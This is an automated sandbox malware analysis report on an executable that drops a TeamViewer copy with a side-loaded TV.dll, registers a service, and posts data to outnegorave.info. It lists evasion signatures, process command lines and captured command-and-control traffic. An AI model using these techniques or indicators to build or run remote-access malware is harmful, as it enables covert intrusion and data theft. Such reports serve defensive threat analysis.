
Windows Analysis Report 77Etc0bR2v.exe

Overview

General Information

Sample Name: 77Etc0bR2v.exe
Analysis ID: 483795
MD5: e71e3b995477081569ed357e4d403666
SHA1: 809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256: 94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags: exeHartexLLCsignedsoldewornek

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 6400 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 77Etc0bR2v.exe (PID: 6880 cmdline: 'C:\Users\user\Desktop\77Etc0bR2v.exe' MD5: E71E3B995477081569ED357E4D403666)
    • TeamViewer.exe (PID: 6952 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 5424 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5568 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 1972 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 5724 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6052 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 4928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 6704 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: 77Etc0bR2v.exe; Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe; ReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll; ReversingLabs: Detection: 26%
Source: 1.2.77Etc0bR2v.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 3_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 3_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 3_2_006F605B CryptReleaseContext,

Compliance:

Uses 32bit PE files
Source: 77Etc0bR2v.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; DLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; DLL: msimg32.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Uses secure TLS version for HTTPS connections
Source: unknown; HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
PE / OLE file has a valid certificate
Source: 77Etc0bR2v.exe; Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; Code function: 1_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; Code function: 1_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe; Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe; Code function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: global traffic; HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 87812Content-Type: multipart/form-data; boundary=--------2771230636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic; HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 90555Content-Type: multipart/form-data; boundary=--------2341619378User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic; HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86397Content-Type: multipart/form-data; boundary=--------1750076427User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: POST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: POST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: unknown; Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown; TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: svchost.exe, 0000000E.00000003.478811722.000001C495982000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.478811722.000001C495982000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","
MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z||.||9eff4c9e-5599-4773-81dc-0299af880dd5||1152921505693851877||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.twitter.com (Twitter)
